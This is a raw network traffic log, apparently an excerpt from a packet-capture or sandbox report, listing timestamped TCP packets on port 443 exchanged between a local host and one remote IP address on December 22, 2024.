                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.382215023 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.382296085 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.382376909 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.382411957 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.382484913 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.382508039 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.382643938 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.382725954 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.383089066 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.383161068 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.383179903 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.383243084 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.383276939 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.383352041 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.383385897 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.383439064 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.383486986 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.383569956 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.383666039 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.383708954 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.383793116 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.425743103 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.425792933 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.425879002 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.425909042 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.426096916 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.426167965 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.426254034 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.426286936 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.426351070 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.426434040 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.426467896 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.426522970 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.426567078 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.426619053 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.426786900 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.426855087 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.426949978 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.426980972 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.427041054 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.427130938 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.427352905 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.427445889 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.427503109 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.427556038 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.427681923 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.427752018 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.427825928 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.428014040 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.428091049 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.428163052 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.428194046 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.428257942 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.428349018 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.428380013 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.428467989 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.428533077 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.428714991 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.429265022 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.430105925 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.443106890 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.443135023 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.443146944 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.443331003 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.443341017 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.443403006 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.443403959 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.443445921 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.443445921 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.443490982 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.443506002 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.443521976 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.443555117 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.443563938 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.443586111 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.443607092 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.443627119 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.443646908 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.443659067 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.443670034 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.443681002 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.443721056 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.443736076 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.443752050 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.443763018 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.443798065 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.443831921 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.443875074 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.443914890 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.443953991 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.443990946 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.444039106 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.444055080 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.444094896 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.444139004 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.444166899 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.458667994 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.467426062 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.467571974 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.467627048 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.467766047 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.467875957 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.467978954 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.468061924 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.468141079 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.468164921 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.468233109 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.468254089 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.468318939 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.511255980 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.511420012 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.511548996 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.511710882 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.511763096 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.511858940 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.511890888 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.511967897 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.512027025 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.512090921 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.512106895 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.512165070 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.512178898 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.512206078 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.512248993 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.512283087 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.512345076 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.512399912 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.512770891 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.512857914 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.512891054 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.512968063 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.513020039 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.513151884 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.513220072 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.513359070 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.513501883 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.513577938 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.513624907 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.513767004 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.513839006 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.513894081 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.514034986 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.514102936 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.514182091 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.514215946 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.514270067 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.514329910 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.514362097 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.514416933 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.514483929 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.514616013 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.514974117 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.515801907 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.521245956 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.521272898 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.521300077 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.521325111 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.521347046 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.521440029 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.521517992 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.521542072 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.521572113 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.521615028 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.521652937 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.521682978 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.521708965 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.521745920 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.521779060 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.521816015 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.521850109 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.521884918 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.521912098 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.536798000 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.567331076 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.567576885 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.611376047 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.611469984 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.632867098 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.633032084 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.633137941 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.633217096 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.633260012 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.633282900 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.633316040 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.633337021 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.633372068 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.633440018 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.633479118 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.633518934 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.633527040 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.633586884 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.633618116 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.633651018 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.633709908 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.633749962 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.633780003 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.633842945 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.635704994 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.635780096 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.635797024 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.635987043 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.636668921 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.637696028 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:15.467044115 CET4434981294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:15.467125893 CET49812443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:15.467713118 CET49812443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:15.467721939 CET4434981294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:15.469475985 CET49812443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:15.469480991 CET4434981294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:16.352992058 CET4434981294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:16.353045940 CET4434981294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:16.353172064 CET49812443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:16.353172064 CET49812443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:16.353183031 CET4434981294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:16.353250027 CET49812443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:16.353405952 CET49812443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:16.353419065 CET4434981294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:16.355899096 CET49821443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:16.356002092 CET4434982194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:16.356092930 CET49821443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:16.356280088 CET49821443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:16.356316090 CET4434982194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:17.762613058 CET4434982194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:17.762700081 CET49821443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:17.763144016 CET49821443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:17.763196945 CET4434982194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:17.764780045 CET49821443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:17.764797926 CET4434982194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:18.653314114 CET4434982194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:18.653381109 CET4434982194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:18.653493881 CET4434982194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:18.653537989 CET49821443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:18.653537989 CET49821443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:18.653537989 CET49821443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:18.653721094 CET49821443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:18.653759956 CET4434982194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:18.674689054 CET49829443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:18.674771070 CET4434982994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:18.674858093 CET49829443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:18.675075054 CET49829443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:18.675108910 CET4434982994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:20.079966068 CET4434982994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:20.080037117 CET49829443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:20.080461025 CET49829443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:20.080487967 CET4434982994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:20.082073927 CET49829443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:20.082087040 CET4434982994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:20.945894003 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:20.945959091 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:20.945981026 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:20.946019888 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:20.946083069 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:20.946126938 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:20.947010994 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:20.947025061 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:20.947210073 CET4434982994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:20.947284937 CET49829443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:20.947359085 CET4434982994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:20.947468042 CET4434982994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:20.947479963 CET49829443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:20.947514057 CET49829443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:20.948254108 CET49829443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:20.948282957 CET4434982994.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:21.747170925 CET49835443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:21.747206926 CET4434983594.130.188.57192.168.2.4
